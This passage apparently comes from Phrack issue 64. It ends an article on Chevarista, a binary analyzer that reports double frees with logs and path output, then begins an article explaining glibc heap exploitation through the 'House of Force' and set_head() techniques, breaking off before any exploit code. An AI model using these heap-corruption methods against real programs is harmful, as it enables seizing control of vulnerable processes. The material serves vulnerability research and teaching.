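Alloc/Free nodes, never on the library code behind them.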

--------------------[ B. Program transformation & modeling

	The project is organized using the Visitor Design Pattern [DP]. To sum
  up, the Visitor Design Pattern allows walking over a graph (that is: the
  intermediate form representation inside the analyzer) and transforming its
  nodes (which contain either basic blocks for control flow analysis, or
  operands for dataflow analysis: indeed, the control or data flow links in the
  graph represent the ancestor / successor relations between (control flow)
  blocks or (data flow) variables).
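As a minimal illustration of this dispatch scheme (our own toy code, not
Chevarista's), a visitor with a default fallback for unhandled node types
looks like this:

```python
# Sketch: Visitor with a default fallback, root of the hierarchy.

class Visitor:
    def visit(self, node):
        # dispatch on the node's type; fall back to the default visitor
        method = getattr(self, "visit_" + type(node).__name__, self.default)
        return method(node)

    def default(self, node):
        return "default:" + type(node).__name__

class Block:   pass   # a control-flow basic block
class Operand: pass   # a dataflow operand

class PrintVisitor(Visitor):
    # handles Block nodes; Operand falls back to the default behavior
    def visit_Block(self, node):
        return "block"

v = PrintVisitor()
print(v.visit(Block()))    # block
print(v.visit(Operand()))  # default:Operand
```

Each transformation below (gate, alias, heap, print...) is one such visitor
subclass walking the same graph.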

  The project is organized as follows:

  visitor     : The default visitor. When the graph contains nodes whose
	      type is not handled by the current visitor, it is this visitor
	      that performs the operation. The default visitor is the root
	      class of the Visitor class hierarchy.

  arch	      : The architecture backend. Currently SPARC32/64 is fully
	      provided and the INTEL backend is just a skeleton. The
	      whole proof of concept was written on SPARC for simplicity. This
	      part also includes the generic code for dataflow and control flow
	      analysis.

  graph	      : Contains all the API for constructing graphs directly in
	      the intermediate language. It also defines all the abstract
	      instructions (and the "more" abstract instructions presented
	      earlier).

  gate	      : This is the interprocedural analysis visitor. Dataflow and
	      control flow links are propagated interprocedurally in this
	      visitor. Additionally, a new type, "Continuation", abstracts
	      different kinds of control transfer (Branch, Call, Ret, etc.),
	      which makes the analysis even easier to perform after this
	      transformation.

  alias	      : Performs a basic point-to analysis to determine obvious aliases 
	      between variables before checking for vulnerabilities. This
	      analysis is exact and thus does not scale to big programs. There
	      are many hours of good reading and hacking to improve this
	      visitor, which would make the whole analyzer much more
	      interesting in practice on big programs.

  heap	      : This visitor does not perform a real transformation, but a
	      simple graph walk to detect anomalies in the data flow graph.
	      Double frees, memory leaks, and the like are implemented in this
	      visitor.

  print	      : The Print Visitor simply prints the intermediate form after
	      each transformation into a text file.

  printdot    : Prints the internal representation in a visual manner
	      (dot/graphviz). This can also be called after each
	      transformation, but we currently call it only at the end of the
	      analysis.

Additionally, another transformation has been started but is still work in
progress:

 symbolic     : Performs translation towards more symbolic intermediate forms
	      (such as SSA and SSI) and (fails to) structure the control flow
	      graph into a graph of zones. This visitor is work in progress but
	      is made part of this release, as Chevarista will be discontinued
	      in its current form, to be reimplemented in the ERESI [RSI]
	      language instead of C++.

	      ---------------      -----------      -----------      ----------   
	     |               |    |           |    |           |    |          |
   RAW       | Architecture  |    |   Gate    |    |   Alias   |    |   Heap   |
       ----> |               | -> |           | -> |           | -> |          | -> Results
   ASM       |   Backend     |    |  Visitor  |    |  Visitor  |    |  Visitor |
             |               |    |           |    |           |    |          |
              ---------------      -----------      -----------      ----------

--------------------[ C. Vulnerability checking

   Chevarista is used as follows in this demo framework. A big testsuite of
   binary files is provided in the package and the analysis is performed on
   them. The whole analysis finishes in only a couple of seconds:

   # We execute chevarista on testsuite binary 34

   $ autonomous/chevarista ../testsuite/34.elf
                  .:/\  Chevarista standalone version /\:.  

   => chevarista 
Detected SPARC
Chevarista IS STARTING
Calling sparc64_IDG
Created IDG
SPARC IDG : New bloc at addr 0000000000100A34 
SPARC IDG : New bloc at addr 00000000002010A0 
[!] Reached Invoke at addr 00000000002010A4 
SPARC IDG : New bloc at addr 0000000000100A44 
Cflow reference to : 00100A50 
Cflow reference from : 00100A48 
Cflow reference from : 00100C20 
SPARC IDG : New bloc at addr 0000000000100A4C 
SPARC IDG : New bloc at addr 0000000000100A58 
SPARC IDG : New bloc at addr 0000000000201080 
[!] Reached Invoke at addr 0000000000201084 
SPARC IDG : New bloc at addr 0000000000100A80 
SPARC IDG : New bloc at addr 0000000000100AA4 
SPARC IDG : New bloc at addr 0000000000100AD0 
SPARC IDG : New bloc at addr 0000000000100AF4 
SPARC IDG : New bloc at addr 0000000000100B10 
SPARC IDG : New bloc at addr 0000000000100B70 
SPARC IDG : New bloc at addr 0000000000100954 
Cflow reference to : 00100970 
Cflow reference from : 00100968 
Cflow reference from : 00100A1C 
SPARC IDG : New bloc at addr 000000000010096C 
SPARC IDG : New bloc at addr 0000000000100A24 
Cflow reference to : 00100A2C 
Cflow reference from : 00100A24 
Cflow reference from : 00100A08 
SPARC IDG : New bloc at addr 0000000000100A28 
SPARC IDG : New bloc at addr 0000000000100980 
SPARC IDG : New bloc at addr 0000000000100A10 
SPARC IDG : New bloc at addr 00000000001009C4 
SPARC IDG : New bloc at addr 0000000000100B88 
SPARC IDG : New bloc at addr 0000000000100BA8 
SPARC IDG : New bloc at addr 0000000000100BC0 
SPARC IDG : New bloc at addr 0000000000100BE0 
SPARC IDG : New bloc at addr 0000000000100BF8 
SPARC IDG : New bloc at addr 0000000000100C14 
SPARC IDG : New bloc at addr 00000000002010C0 
[!] Reached Invoke at addr 00000000002010C4 
SPARC IDG : New bloc at addr 0000000000100C20 
SPARC IDG : New bloc at addr 0000000000100C04 
SPARC IDG : New bloc at addr 0000000000100910 
SPARC IDG : New bloc at addr 0000000000201100 
[!] Reached Invoke at addr 0000000000201104 
SPARC IDG : New bloc at addr 0000000000100928 
SPARC IDG : New bloc at addr 000000000010093C 
SPARC IDG : New bloc at addr 0000000000100BCC 
SPARC IDG : New bloc at addr 00000000001008E0 
SPARC IDG : New bloc at addr 00000000001008F4 
SPARC IDG : New bloc at addr 0000000000100900 
SPARC IDG : New bloc at addr 0000000000100BD8 
SPARC IDG : New bloc at addr 0000000000100B94 
SPARC IDG : New bloc at addr 00000000001008BC 
SPARC IDG : New bloc at addr 00000000001008D0 
SPARC IDG : New bloc at addr 0000000000100BA0 
SPARC IDG : New bloc at addr 0000000000100B34 
SPARC IDG : New bloc at addr 0000000000100B58 
Cflow reference to : 00100B74 
Cflow reference from : 00100B6C 
Cflow reference from : 00100B2C 
Cflow reference from : 00100B50 
SPARC IDG : New bloc at addr 0000000000100B04 
SPARC IDG : New bloc at addr 00000000002010E0 
SPARC IDG : New bloc at addr 0000000000100AE8 
SPARC IDG : New bloc at addr 0000000000100A98 
Intraprocedural Dependance Graph has been built succesfully! 
A number of 47 blocs has been statically traced for flow-types
[+] IDG built

Scalar parameter REPLACED with name = %o0 (addr= 00000000002010A4)
Backward dataflow analysis VAR        %o0, instr addr 00000000002010A4 
Scalar parameter REPLACED with name = %o0 (addr= 00000000002010A4)
Backward dataflow analysis VAR        %o0, instr addr 00000000002010A4 
Scalar parameter REPLACED with name = %o0 (addr= 00000000002010A4)
Backward dataflow analysis VAR        %o0, instr addr 00000000002010A4 
Backward dataflow analysis VAR        %fp, instr addr 0000000000100A48 
Return-Value REPLACED with name = %i0 (addr= 0000000000100A44) 
Backward dataflow analysis VAR        %i0, instr addr 0000000000100A44 
Backward dataflow analysis VAR        %fp, instr addr 0000000000100A5C 
Return-Value REPLACED with name = %i0 (addr= 0000000000100A58) 
Backward dataflow analysis VAR        %i0, instr addr 0000000000100A58 
Backward dataflow analysis VAR [%fp + 7e7], instr addr 0000000000100A6C 
Scalar parameter REPLACED with name = %o0 (addr= 0000000000201084)
Backward dataflow analysis VAR        %o0, instr addr 0000000000201084 
Scalar parameter REPLACED with name = %o0 (addr= 0000000000201084)
Backward dataflow analysis VAR        %o0, instr addr 0000000000201084 
Scalar parameter REPLACED with name = %o1 (addr= 0000000000201084)
Backward dataflow analysis VAR        %o1, instr addr 0000000000201084 
Scalar parameter REPLACED with name = %o1 (addr= 0000000000201084)
Backward dataflow analysis VAR        %o1, instr addr 0000000000201084 
Scalar parameter REPLACED with name = %o2 (addr= 0000000000201084)
Backward dataflow analysis VAR        %o2, instr addr 0000000000201084 
Scalar parameter REPLACED with name = %o2 (addr= 0000000000201084)
Backward dataflow analysis VAR        %o2, instr addr 0000000000201084 
Backward dataflow analysis VAR        %fp, instr addr 0000000000100A84 
Return-Value REPLACED with name = %i0 (addr= 0000000000100A80) 
Backward dataflow analysis VAR        %i0, instr addr 0000000000100A80 
Backward dataflow analysis VAR [%fp + 7d3], instr addr 0000000000100AA4 
Backward dataflow analysis VAR [%fp + 7df], instr addr 0000000000100ABC 
Backward dataflow analysis VAR [%fp + 7e7], instr addr 0000000000100AAC 
Backward dataflow analysis VAR        %fp, instr addr 0000000000100AD4 
Return-Value REPLACED with name = %i0 (addr= 0000000000100AD0) 
Backward dataflow analysis VAR        %i0, instr addr 0000000000100AD0 
Backward dataflow analysis VAR [%fp + 7d3], instr addr 0000000000100AF4 
Backward dataflow analysis VAR [%fp + 7d3], instr addr 0000000000100B24 
Backward dataflow analysis VAR [%fp + 7df], instr addr 0000000000100B18 
Backward dataflow analysis VAR [%fp + 7e7], instr addr 0000000000100B70 
Backward dataflow analysis VAR [%fp + 7e7], instr addr 0000000000100B70 
Backward dataflow analysis VAR [%fp + 7e7], instr addr 0000000000100B70 
Backward dataflow analysis VAR [%fp + 7e7], instr addr 0000000000100B38 
Backward dataflow analysis VAR        %fp, instr addr 0000000000100964 
Backward dataflow analysis VAR        %fp, instr addr 0000000000100964 
Backward dataflow analysis VAR        %fp, instr addr 0000000000100964 
Scalar parameter REPLACED with name = %o0 (addr= 0000000000100958)
Backward dataflow analysis VAR        %o0, instr addr 0000000000100958 
Scalar parameter REPLACED with name = %o0 (addr= 0000000000100958)
Backward dataflow analysis VAR        %fp, instr addr 0000000000100B6C 
Backward dataflow analysis VAR [%fp + 7df], instr addr 0000000000100B60 
Backward dataflow analysis VAR [%fp + 7e7], instr addr 0000000000100B58 
[+] GateVisitor finished

[+] AliasVisitor finished

+ Entered Node Splitting for Node id 24 
+ Entered Node Splitting for Node id 194 
+ Entered Node Splitting for Node id 722 
+ Entered Node Splitting for Node id 794 
+ Entered Node Splitting for Node id 1514 
+ Entered Node Splitting for Node id 1536 
+ Entered Node Splitting for Node id 1642 
[+] SymbolicVisitor finished

Entering DotVisitor
+ SESE visited
+ SESE visited
* SESE already visited
* SESE already visited
+ SESE visited
+ SESE visited
* SESE already visited
* SESE already visited
* SESE already visited
! Node pointed by (nil) is NOT a SESE
+ SESE visited
* SESE already visited
* SESE already visited
* SESE already visited
[+] Print*Visitors finished

Starting HeapVisitor
Double Free found
Double Free found
Double malloc
[+] Heap visitor finished

[+] Chevarista has finished

    The run was performed in less than 2 seconds and multiple vulnerabilities
    have been found in the binary file (two double frees and one memory leak,
    as indicated by the latest output). This is pretty useless without more
    information, which brings us to the results.

-------------------------[ D. Vulnerable paths extraction

      Once the analysis has been performed, we can simply check what the vulnerable
      paths were:

      ~/IDA/sdk/plugins/chevarista/src $ ls tmp/
      cflow.png  chevarista.alias  chevarista.buchi  chevarista.gate
      chevarista.heap  chevarista.lir  chevarista.symbolic  dflow.png

      Each visitor (transformation) outputs the complete program in its
      intermediate form. The most interesting one is the output of the heap
      visitor, which gives us exactly the vulnerable paths:

      ~/IDA/sdk/plugins/chevarista/src $ cat tmp/chevarista.heap 

      [%fp + 7e7]

      [%fp + 7df]


      *                                 *
      * Multiple free of same variables *
      *                                 *

      path to free : 1
      @0x2010a4 (0) {S} 32: inparam_%i0 = Alloc(inparam_%i0)      
      @0x100a44 (4) {S} 46: %g1 = outparam_%o0                    
      @0x100a48 (8) {S} 60: local_%fp$0x7e7 = %g1                 
      @0x100bcc (8) {S} 1770: outparam_%o0 = local_%fp$0x7e7      
      @0x1008e4 (8) {S} 1792: local_%fp$0x87f = inparam_%i0       
      @0x1008f4 (8) {S} 1828: outparam_%o0 = local_%fp$0x87f      
      @0x2010c4 (0) {S} 1544: inparam_%i0 = Free(inparam_%i0)     

      path to free : 2
      @0x2010a4 (0) {S} 32: inparam_%i0 = Alloc(inparam_%i0)      
      @0x100a44 (4) {S} 46: %g1 = outparam_%o0                    
      @0x100a48 (8) {S} 60: local_%fp$0x7e7 = %g1                 
      @0x100b58 (8) {S} 2090: %g1 = local_%fp$0x7e7               
      @0x100b5c (8) {S} 2104: local_%fp$0x7d7 = %g1               
      @0x100b68 (8) {S} 2146: %g1 = local_%fp$0x7d7               
      @0x100b6c (8) {S} 2160: local_%fp$0x7df = %g1               
      @0x100c14 (8) {S} 1524: outparam_%o0 = local_%fp$0x7df      
      @0x2010c4 (0) {S} 1544: inparam_%i0 = Free(inparam_%i0)     

      path to free : 3
      @0x2010a4 (0) {S} 32: inparam_%i0 = Alloc(inparam_%i0)      
      @0x100a58 (4) {S} 96: %g1 = outparam_%o0                    
      @0x100a5c (8) {S} 110: local_%fp$0x7df = %g1                
      @0x100c14 (8) {S} 1524: outparam_%o0 = local_%fp$0x7df      
      @0x2010c4 (0) {S} 1544: inparam_%i0 = Free(inparam_%i0)     

      path to free : 4
      @0x2010a4 (0) {S} 32: inparam_%i0 = Alloc(inparam_%i0)      
      @0x100a58 (4) {S} 96: %g1 = outparam_%o0                    
      @0x100a5c (8) {S} 110: local_%fp$0x7df = %g1                
      @0x100b60 (8) {S} 2118: %g1 = local_%fp$0x7df               
      @0x100b64 (8) {S} 2132: local_%fp$0x7e7 = %g1               
      @0x100bcc (8) {S} 1770: outparam_%o0 = local_%fp$0x7e7      
      @0x1008e4 (8) {S} 1792: local_%fp$0x87f = inparam_%i0       
      @0x1008f4 (8) {S} 1828: outparam_%o0 = local_%fp$0x87f      
      @0x2010c4 (0) {S} 1544: inparam_%i0 = Free(inparam_%i0)     
      ~/IDA/sdk/plugins/chevarista/src $ 

As you can see, we now have the complete vulnerable paths where multiple
frees are done in sequence on the same variables. In this example, two
double frees were found and one memory leak, for which the path to free
is not given, since there is none (it is a memory leak :).
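The underlying check can be sketched as a depth-first walk over the data-flow
graph, flagging any path from an allocation that reaches two Free statements.
The graph below is a hand-built toy, not Chevarista's real IR:

```python
# Sketch: flag paths from an allocation that hit Free more than once.

def find_double_free_paths(graph, node, frees=0, path=()):
    path = path + (node,)
    if graph[node]["op"] == "free":
        frees += 1
        if frees >= 2:        # second free of the same object: report path
            yield path
            return
    for succ in graph[node]["succ"]:
        yield from find_double_free_paths(graph, succ, frees, path)

# toy data-flow graph: alloc -> use -> free -> free
g = {
    "alloc": {"op": "alloc", "succ": ["use"]},
    "use":   {"op": "copy",  "succ": ["free1"]},
    "free1": {"op": "free",  "succ": ["free2"]},
    "free2": {"op": "free",  "succ": []},
}

for p in find_double_free_paths(g, "alloc"):
    print(" -> ".join(p))  # alloc -> use -> free1 -> free2
```

The real heap visitor does the same walk over def-use chains in the IR, which
is why it can print the full sequence of assignments between Alloc and the
offending Free.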

A very useful trick was also to give more refined types to operands. For
instance, local variables can be identified pretty easily if they are
accessed through the stack pointer. Function parameters and results
can also be found easily by inspecting the use of the %i and %o registers
(on the SPARC architecture only).
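On SPARC this refinement is essentially a pattern match on how an operand is
addressed. A toy sketch (the classification rules are simplified from the
description above and are ours):

```python
# Sketch: refine SPARC operand types from register usage.

def refine_operand(reg, via_fp=False):
    if via_fp:                # accessed through the frame pointer:
        return "local"        # a stack-allocated local variable
    if reg.startswith("%i"):
        return "inparam"      # incoming function parameter
    if reg.startswith("%o"):
        return "outparam"     # outgoing parameter / return value slot
    return "scalar"           # anything else: plain scalar temporary

print(refine_operand("%i0"))               # inparam
print(refine_operand("%o0"))               # outparam
print(refine_operand("%g1"))               # scalar
print(refine_operand("%fp", via_fp=True))  # local
```

This matches the names seen in the trace above (inparam_%i0, outparam_%o0,
local_%fp$0x7e7).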

----------------[ E. Future work : Refinement

	The final step of the analysis is refinement [CEGF]. Once we have
   analyzed a program for vulnerabilities and extracted the paths of the
   program that look likely to lead to a corruption, we need to recreate the
   real conditions for triggering the bug in reality, and not just in an
   abstract description of the program, as we did in this article. For this, we
   need to execute the program for real (this time), and try to feed it with
   data that are deduced from the conditional predicates along the abstract
   path of the program that leads to the potential vulnerability. The input
   values that we give to the program must pass all the tests that are on the
   way to reaching the bug in the real world.
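In its crudest form, refinement is a search for a concrete input that
satisfies every conditional predicate on the abstract path. Real refinement
engines such as BLAST use decision procedures rather than brute force; the
sketch below (predicates invented for illustration) only shows the idea:

```python
# Sketch: find a concrete input passing all predicates on a path.

predicates = [
    lambda x: x > 10,        # e.g. "if (len > 10)"
    lambda x: x % 2 == 0,    # e.g. "if (!(len & 1))"
    lambda x: x < 100,       # e.g. a bounds check on the way to the bug
]

def refine(preds, domain):
    for candidate in domain:
        if all(p(candidate) for p in preds):
            return candidate
    return None  # path infeasible on this domain: spurious warning

print(refine(predicates, range(256)))  # 12
```

When refine() returns None, the abstract counterexample was spurious and the
abstraction itself should be refined; that feedback loop is exactly the
iterative procedure mentioned below.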

   Not a lot of projects use this technique. It is quite recent research to
   determine exactly how to be as precise as possible while still scaling to
   very big programs. One answer is that precision can be requested on demand,
   using an iterative procedure, as done in the BLAST [BMC] model checker. Even
   advanced abstract interpretation frameworks [ASA] do not have refinement
   yet : some would argue it is too computationally expensive to refine
   abstractions, and that it is better to couple weaker abstractions together
   than to try to refine a single "perfect" one.


---------------[ V. Related Work

	Almost no project on this topic has been initiated by the underground.
	The work of Nergal on finding integer overflows in Win32 binaries [UNG]
	is the first notable attempt to mix research knowledge and reverse
	engineering knowledge, using a decompiler and a model checker. The work
	of Halvar Flake in the framework of BinDiff/BinNavi [BN] is interesting,
	but has so far served a different purpose than finding vulnerabilities
	in binary code.

	From a more theoretical point of view, the interested reader is invited
	to look at the references for many major readings in the field of
	program analysis. Automated reverse engineering, or decompilation, has
	been studied only in the last 10 years, and the gap is still not
	completely filled between those two worlds. This article tried to go in
	that direction by introducing formal techniques from a completely
	informal point of view.

	Mostly two different theories can be studied : Model Checking [MC] and
	Abstract Interpretation [AI]. Model checking generally involves temporal
	logic properties expressed in languages such as LTL, CTL, or CTL* [TL].
	Those properties are then translated into automata. Traces are then used
	as words, and the automaton failing to recognize a given trace means a
	property is broken. In practice, the formula is negated, so that the
	resulting automaton will only recognize the traces leading to
	vulnerabilities, which sounds like a more natural approach for detecting
	them.

	Abstract interpretation [ASA] is about finding the most adequate system
	representation to make the checking computable in a reasonable time
	(otherwise we might end up doing an "exhaustive bruteforce checking" if
	we try to check all the potential behaviors of the program, which can,
	by the way, be infinite). By reasoning in an abstract domain, we make the
	state space finite (or at least reduced, compared to the real state
	space), which makes our analysis tractable. The stronger the
	abstractions are, the faster but less precise our analysis will be. All
	the job consists in finding the best (when possible), or an approximate,
	abstraction that is precise enough and strong enough to give results in
	seconds or minutes.

	In this article, we have presented some abstractions without naming them
	explicitly (interval abstraction, trace abstraction, predicate
	abstraction ...). You can also design product domains, where multiple
	abstractions are considered at the same time, which gives the best
	results, but for which automated procedures require more work to be
	defined.

------[ VI. Conclusion

	I hope to have encouraged the underground community to think about using
	more formal techniques for the discovery of bugs in programs. I do not
	provide the dream automated tool, but a simpler one that shows this
	approach to be rewarding, and I look forward to seeing more automated
	tools from the reverse engineering community in the future. The
	Chevarista analyzer will not be continued as is, but is being
	reimplemented in a different analysis environment, on top of a dedicated
	language for reverse engineering and decompilation of machine code. Feel
	free to hack inside the code; you don't have to send me patches, as I do
	not use this tool anymore for my own vulnerability auditing. I do not
	wish to encourage script kiddies to use such tools, as they would not
	know how to exploit the results anyway (no, this does not give you a
	root shell).

------[ VII. Greetings

	Why should every single Phrack article have greetings?

	The persons who enjoyed Chevarista know who they are.

------[ VIII. References

 [TVLA] Three-Valued Logic
 [AI] Abstract Interpretation

 [MC] Model Checking

 [CEGF] Counterexample-guided abstraction refinement 
        E Clarke - Temporal Representation and Reasoning

 [BN] Sabre-security BinDiff & BinNavi

 [JPF] NASA JavaPathFinder

 [UNG] UQBT-ng : a tool that finds integer overflow in Win32 binaries

 [SSA] Efficiently computing static single assignment form
       R Cytron, J Ferrante, BK Rosen, MN Wegman
       ACM Transactions on Programming Languages and Systems

 [SSI] Static Single Information (SSI)
       CS Ananian - 1999

 [MCI] Modern Compiler Implementation (Book)
       Andrew Appel
 [BMC] The BLAST Model Checker

 [AD] 22C3 - Autodafe : an act of software torture

 [TL] Linear Temporal logic

 [ASA] The ASTREE static analyzer

 [DLB] Dvorak LKML select bug
       Somewhere lost on

 [RSI] ERESI (Reverse Engineering Software Interface)

 [PA] Automatic Predicate Abstraction of C Programs
      T Ball, R Majumdar, T Millstein, SK Rajamani 
      ACM SIGPLAN Notices 2001

 [IRM] INTEL reference manual

 [SRM] SPARC reference manual

 [LAT] Wikipedia : lattice
 [DDA] Data Dependence Analysis of Assembly Code

 [DP] Design Patterns : Elements of Reusable Object-Oriented Software
      Erich Gamma, Richard Helm, Ralph Johnson & John Vlissides

------[ IX. The code    

Feel free to contact me to get the code. It is not included
in this article, but I will provide it on request if you show
an interest. 


            _                                                    _
          _/B\_                                                _/W\_
          (* *)                Phrack #64 file 9               (* *)
          | - |                                                | - |
          |   |  The use of set_head to defeat the wilderness  |   |
          |   |                                                |   |
          |   |                    By g463                     |   |
          |   |                                                |   |
          |   |                                                |   |

1 - Introduction

2 - The set_head() technique
  2.1 - A look at the past - "The House of Force" technique
  2.2 - The basics of set_head()
  2.3 - The details of set_head()

3 - Automation
  3.1 - Define the basic properties
  3.2 - Extract the formulas
  3.3 - Compute the values

4 - Limitations
  4.1 - Requirements of two different techniques
      4.1.1 - The set_head() technique
      4.1.2 - The "House of Force" technique
  4.2 - Almost 4 bytes to almost anywhere technique
      4.2.1 - Everything in life is a multiple of 8
      4.2.2 - Top chunk's size needs to be bigger than the requested malloc
      4.2.3 - Logical OR with PREV_INUSE

5 - Taking set_head() to the next level
  5.1 - Multiple overwrites
  5.2 - Infoleak

6 - Examples
  6.1 - The basic scenarios
      6.1.1 - The most basic form of the set_head() technique
      6.1.2 - Exploit
      6.1.3 - Multiple overwrites
      6.1.4 - Exploit
  6.2 - A real case scenario: file(1) utility
      6.2.1 - The hole
      6.2.2 - All the pieces fall into place
      6.2.3 - hanuman.c

7 - Final words

8 - References

--[ 1 - Introduction

Many papers have been published in the past describing techniques on how to
take advantage of the inbound memory management in the GNU C Library
implementation.  A first technique was introduced by Solar Designer in his
security advisory on a flaw in the Netscape browser[1].  Since then, many
improvements have been made by many different individuals ([2], [3], [4],
[5], [6] just to name a few).  However, there is always one situation that
gives a lot more trouble than others.  Anyone who has already tried to take
advantage of that situation will agree. How to take control of a vulnerable
program when the only critical information that you can overwrite is the
header of the wilderness chunk?

The set_head technique is a new way to obtain a "write almost 4 arbitrary
bytes to almost anywhere" primitive. It was born because of a bug in the
file(1) utility that the author was unable to exploit with existing

This paper will present the details of the technique.  Also, it will show
you how to practically apply this technique to other exploits.  The
limitations of the technique will also be presented.  Finally, some
examples will be shown to better understand the various aspects of the

--[ 2 - The set_head() technique

Most of the time, people who write exploits using malloc techniques are not
aware of the difficulties that the wilderness chunk implies until they face
the problem.  It is only at this exact time that they realize how the known
techniques (i.e. unlink, etc.) have no effect on this particular context.

As MaXX once said [3]: "The wilderness chunk is one of the most dangerous
opponents of the attacker who tries to exploit heap mismanagement. Because
this chunk of memory is handled specially by the dlmalloc internal
routines, the attacker will rarely be able to execute arbitrary code if
they solely corrupt the boundary tag associated with the wilderness chunk."

----[ 2.1 - A look at the past - "The House of Force" technique

To better understand the details of the set_head() technique explained in
this paper, it would be helpful to first understand what has already been
done on the subject of exploiting the top chunk.

This is not the first time that the exploitation of the wilderness chunk
has been specifically targeted.  The pioneer of this type of exploitation
is Phantasmal Phantasmagoria.

He first wrote an article entitled "Exploiting the wilderness" about it in
2004.  Details of this technique are out of scope for the current paper,
but you can learn more about it by reading his paper [5].

He gave a second try at exploiting the wilderness in his excellent paper
"Malloc Maleficarum" [4].  He named his technique "The House of Force".  To
better understand the set_head() technique, the "House of Force" is
described below.

The idea behind "The House of Force" is quite simple but there are specific
steps that need to be followed.  Below, you will find a brief summary of
all the steps.

Step one:

The first step in the "House of Force" consists in overflowing the size
field of the top chunk to make the malloc library think it is bigger than
it actually is.  The preferred new size of the top chunk should be
0xffffffff.  Below is an ascii graphic of the memory layout at the time
of the overflow.  Notice that the location of the top chunk is somewhere in
the heap.

                0xbfffffff  -> +-----------------+
                               |                 |
                               |     stack       |
                               |                 |
                               :                 :
                               :                 :
                               .                 .
                               :                 :
                               :                 :
                               |                 |
                               |                 |
                               |      heap       |<--- Top chunk
                               |                 |
                               |  global offset  |
                               |      table      |
                               |                 |
                               |                 |
                               |      text       |
                               |                 |
                               |                 |
                0x08048000  -> +-----------------+

Step two:

After this, a call to malloc with a user-supplied size should be issued.
With this call, the top chunk will be split in two parts.  One part will be
returned to the user, and the other part will be the remainder chunk (the
top chunk).

The purpose of this step is to move the top chunk right before a global
offset table entry.  The new location of the top chunk is the sum of the
current address of the top chunk and the value of the malloc call.  This
sum is done with the following line of code:

        --[ From malloc.c

        remainder = chunk_at_offset(victim, nb);

After the malloc call, the memory layout should be similar to the
representation below:

                0xbfffffff  -> +-----------------+
                               |                 |
                               |     stack       |
                               |                 |
                               :                 :
                               :                 :
                               .                 .
                               :                 :
                               :                 :
                               |                 |
                               |                 |
                               |      heap       |
                               |                 |
                               |  global offset  |
                               |      table      |
                               +-----------------+<--- Top chunk
                               |                 |
                               |                 |
                               |      text       |
                               |                 |
                               |                 |
                0x08048000  -> +-----------------+

Step three:

Finally, another call to malloc needs to be done.  This one needs to be
large enough to trigger the top chunk code.  If the user has some sort of
control over the content of this buffer, he can then overwrite entries
inside the global offset table and he can seize control of the process.
Look at the following representation for the current memory layout at the
time of the allocation:

                0xbfffffff  -> +-----------------+
                               |                 |
                               |     stack       |
                               |                 |
                               :                 :
                               :                 :
                               .                 .
                               :                 :
                               :                 :
                               |                 |
                               |                 |
                               |      heap       |<---- Top chunk
                               |                 |---+
                               +-----------------+   |
                               |  global offset  |   |- Allocated memory
                               |      table      |   |
                               |                 |
                               |                 |
                               |      text       |
                               |                 |
                               |                 |
                0x08048000  -> +-----------------+

----[ 2.2 - The basics of set_head()

Now that the basic review of the "House of Force" technique is done, let's
look at the set_head() technique.  The basic idea behind this technique is
to use the set_head() macro to write almost four arbitrary bytes to almost
anywhere in memory.  This macro is normally used to set the value of the
size field of a memory chunk to a specific value.  Let's have a peek at
the macro definition:

        --[ From malloc.c:

        /* Set size/use field */
        #define set_head(p, s)       ((p)->size = (s))

This line is very simple to understand.  It takes the memory chunk 'p' and
replaces the value of its size field with the value of the variable 's'.
If the attacker has control of those two parameters, it may be possible to
modify the content of an arbitrary memory location with a value that he
controls.

To trigger the particular call to set_head() that could lead to this
arbitrary overwrite, two specific steps need to be followed.  These steps
are described below.

First step:

The first step of the set_head() technique consists in overflowing the size
field of the top chunk to make the malloc library think it is bigger than
it actually is.  The specific value that you will overwrite with will
depend on the parameters of the exploitable situation.  Below is an ascii
graphic of the memory layout at the time of the overflow.  Notice that the
location of the top chunk is somewhere in the heap.

                0xbfffffff  -> +-----------------+
                               |                 |
                               |      stack      |
                               |                 |
                               :                 :
                               :                 :
                               .                 .
                               :                 :
                               :                 :
                               |                 |
                               |                 |
                               |      heap       |<--- Top chunk
                               |                 |
                               |                 |
                               |      data       |
                               |                 |
                               |                 |
                               |                 |
                               |      text       |
                               |                 |
                               |                 |
                0x08048000  -> +-----------------+

Second step:

After this, a call to malloc with a user-supplied size should be issued.
With this call, the top chunk will be split in two parts.  One part will be
returned to the user, and the other part will be the remainder chunk (the
top chunk).

The purpose of this step is to move the top chunk before the location that
you want to overwrite.  This location needs to be on the stack, and you
will see why in section 4.2.2.  During this step, the malloc code will set
the size of the new top chunk with the set_head() macro.  Look at the
representation below to better understand the memory layout at the time of
the overwrite:

                0xbfffffff  -> +-----------------+
                               |                 |
                               |      stack      |
                               |                 |
                               | size of topchunk|
                               | prev_size unused|
                               +-----------------+<--- Top chunk
                               |                 |
                               :                 :
                               :                 :
                               .                 .
                               :                 :
                               :                 :
                               |                 |
                               |                 |
                               |      heap       |
                               |                 |
                               |                 |
                               |      data       |
                               |                 |
                               |                 |
                               |                 |
                               |      text       |
                               |                 |
                               |                 |
                0x08048000  -> +-----------------+

If you control the new location of the top chunk and the new size of the
top chunk, you can get a "write almost 4 arbitrary bytes to almost
anywhere" primitive.

----[ 2.3 - The details of set_head()

The set_head macro is used many times in the malloc library.  However, it's
used at one particularly interesting location where it's possible to
influence its parameters.  This influence will let the attacker overwrite 4
bytes in memory with a value that he can control.

When there is a call to malloc, different methods are tried to allocate the
requested memory.  MaXX did a pretty great job at explaining the malloc
algorithm in section 3.5.1 of his text[3].  Reading his text is highly
suggested before continuing with this text.  Here are the main points of
the algorithm:

        1. Try to find a chunk in the bin corresponding to the size of the
           request;

        2. Try to use the remainder chunk;

        3. Try to find a chunk in the regular bins.

If those three steps fail, interesting things happen.  The malloc function
tries to split the top chunk.  The 'use_top' code portion is then called.
It's in that portion of code that it's possible to take advantage of a call
to set_head().  Let's analyze the use_top code:

--[ From malloc.c

01 Void_t*
02 _int_malloc(mstate av, size_t bytes)
03 {
04   INTERNAL_SIZE_T nb;               /* normalized request size */
06   mchunkptr       victim;           /* inspected/selected chunk */
07   INTERNAL_SIZE_T size;             /* its size */
09   mchunkptr       remainder;        /* remainder from a split */
10   unsigned long   remainder_size;   /* its size */
13   checked_request2size(bytes, nb);
15 [ ... ]
17     use_top:
19     victim = av->top;
20     size = chunksize(victim);
22     if ((unsigned long)(size) >= (unsigned long)(nb + MINSIZE)) {
23       remainder_size = size - nb;
24       remainder = chunk_at_offset(victim, nb);
25       av->top = remainder;
26       set_head(victim, nb | PREV_INUSE |
27                (av != &main_arena ? NON_MAIN_ARENA : 0));
28       set_head(remainder, remainder_size | PREV_INUSE);
